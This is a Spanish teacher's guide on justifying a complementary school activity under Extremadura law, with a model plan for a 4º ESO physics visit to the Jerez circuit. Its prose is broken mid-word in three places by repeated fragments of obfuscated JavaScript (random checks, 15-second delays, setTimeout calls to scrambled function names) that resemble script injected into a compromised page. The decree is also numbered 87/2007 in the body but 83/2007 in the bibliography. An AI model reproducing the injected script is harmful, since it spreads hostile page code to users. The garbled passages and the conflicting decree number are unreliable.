JUSTIFICACIÓN DE UNA ACTIVIDAD COMPLEMENTARIA

Autor: Antonio Luis Merchán Vacas

Con este escrito se pretende orientar al profesorado sobre el diseño y la justificación de una actividad complementaria.

“El desarrollo de las competencias básicas debe facilitarse también mediante

el adecuado funcionamiento de los centros, las actividades docentes, las

formas de relación que se establezcan entre los integrantes de la comunidad

educativa y las actividades complementarias y extraescolares que organicen

los centros”. Esto se recoge en el decreto 87/2007 por el que se establece el

currículo de la ESO en Extremadura.

La LEEX, como es lógico, también hace referencia a las actividades

complementarias en su artículo 15, y las define como actividades que se

desarrollarán fuera del horario lectivo y tendrán como objetivo completar la

acción educativa del alumnado. Serán programadas e impartidas por personal

debidamente cualificado.

De estos dos documentos se recoge la importancia de estas actividades en la

formación del alumnado, por ello cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando se programen hay que justificar la

realización de las mismas de acuerdo con la legislación vigente, es decir

tenemos que encuadrar dicha actividad dentro del marco educativo establecido.

Para ello os propongo un ejemplo que puede servir de modelo a la hora de

diseñar una actividad complementaria, en este caso para 4º ESO.

Actividad complementaria: Visita al circuito de velocidad de Jerez

1. Objetivos que se persiguen:

–Estudiar los distintos movimientos.

–Identificar las fuerzas que actúan.

–Reconocer las transformaciones energéticas que se producen.

–Disfrutar de una jornada de convivencia fuera del centro.

2. Contenidos que se van a tratar:

–Trayectorias que siguen los coches.

–Movimiento rectilíneo uniforme.

–Movimiento rectilíneo uniformemente variado.

–Movimiento circular uniforme.

–Fuerza de rozamiento.

–Fuerza centrípeta.

–Energía cinética y potencial.

–Energía calorífica.

–Energía interna y reacción de combustión de un combustible.

3. Competencias básicas que se trabajan:

–Competencia matemática, en la resolución de problemas numéricos.

–Competencia en el conocimiento y en la interacción con el mundo físico,

reconociendo en la vida cotidiana los distintos tipos de movimientos y de

fuerzas.

–Competencia social y ciudadana, a la hora de hacerle pensar a los

alumnos/as sobre la gran cantidad de dinero que se invierte en la F1, el lujo

que le rodea, etc.

4. Educación en valores:

–Educación vial, resaltandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando la importancia de no sobrepasar los límites de

velocidad y mantener la distancia de seguridad entre vehículos.

–Educación moral y cívica, para que los alumnos sepan que conducir un

vehículo requiere del cumplimiento de unos principios básicos que mantengan

su seguridad.

–Educación para la igualdad de sexos, porque hay mujeres que conducen

coches de velocidad, aunque aún no han llegado a la F1, que hay mujeres

ingenieras o que se dedican a la mecánica de los coches, etc y que todas

tendrían que disfrutar de las mismas oportunidades que los hombres.

5. Unidades didácticas de mi programación relacionadas con la actividad:

–U D: el movimiento

–U D: las fuerzas

–U D: energía y calor

6. Actividades que tiene que hacer el alumnado:

–Se hará una representación de la trayectoria que siguen los coches según la

posición del circuito en la que se encuentren.

–Indicarán los tipos de movimiento que se producen en esa zona

representandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando gráficamente las fuerzas que intervienen.

–Justificarán las transformaciones energéticas que se producen.

De esta forma se tratarían todos los puntos que pueden abarcar una actividad

complementaria para quedar perfectamente definida y encuadrada en el marco

legislativo actual.

Bibliografía

- DECRETO 83/2007, de 24 de abril, por el que se establece el Currículo de

Educación Secundaria Obligatoria para la Comunidad Autónoma de

Extremadura.

- LEEX:  Ley 4/2011, de 7 de marzo, de Educación de Extremadura.

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